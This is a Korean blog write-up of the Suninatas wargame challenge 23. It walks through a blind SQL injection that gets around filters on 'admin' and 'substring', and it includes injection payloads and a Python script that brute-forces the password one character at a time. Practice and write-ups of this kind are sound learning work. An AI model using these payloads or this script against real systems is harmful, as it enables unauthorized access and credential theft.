써니나타스 23번

2023. 8. 20. 21:09써니나타스

써니나타스 23번 문제입니다.

admin 단어가 필터링 되어있습니다.

substring 함수도 필터링 되어있네요.

admin 문자열을 필터링 한 후

pw길이를 알아보았습니다.

11보다 크네요

pw의 길이는 12인 것을 알수 있었습니다.

이제 pw의 값을 알아내야하는데 substring함수가 필터링이 되어있어서

left함수를 통해서 pw의 1번쨰 값을 알수있었습니다.

하지만 30글자 필터링 떄문에 2번쨰 글자는 알수없어서 

'or left(pw,1) ='V' -- 

통해서 파이썬 코드를 통해서 pw의 값을 알아낼수있었습니다.

import requests 
pw = 'V' #pw 첫 글자
#12글자
#'or left(pw,2)='V3' --
baseurl ="http://suninatas.com/challenge/web23/web23.asp" #타겟 url
for i in range(2,13):
    for j in range(33,128):
        url = baseurl+"?id='or+left(pw,{})='{}'-- &pw=1234".format(i,pw+chr(j))
        cookies = {'ASPSESSIONIDAACDSAQA':''}
        res = requests.get(url=url,cookies=cookies)


        if res.text.find("OK") != -1:
            pw = pw + chr(j)
            print(str(i)+" : "+chr(j))
            break

print("password : "+pw)

ad'+'min'or len(pw)>11 --

.... blind sqli 직접 소스 짜는건 너무 어렵워오ㅠ ㅠㅠ 

https://hackchang.tistory.com/92

 

[Suninatas] 써니나타스 23번 문제 풀이

이번 문제도 Blind SQL Injection 문제다. 저번문제와 비슷해보이지만, 필터링에 admin과 substring이 추가됐다. admin을 필터하기 때문에 adm이라는 문자열과 in이라는 문자열을 합치면 필터를 우회할 수 있

hackchang.tistory.com

 

고수님 블로그 감사합니다. :) 

'써니나타스' 카테고리의 다른 글

써니나타스 25번  (0) 2023.10.19
써니나타스 24번  (0) 2023.10.18
써니나타스 22번  (0) 2023.08.15
써니나타스 21번  (0) 2023.08.15
써니나타스 20번  (0) 2023.08.15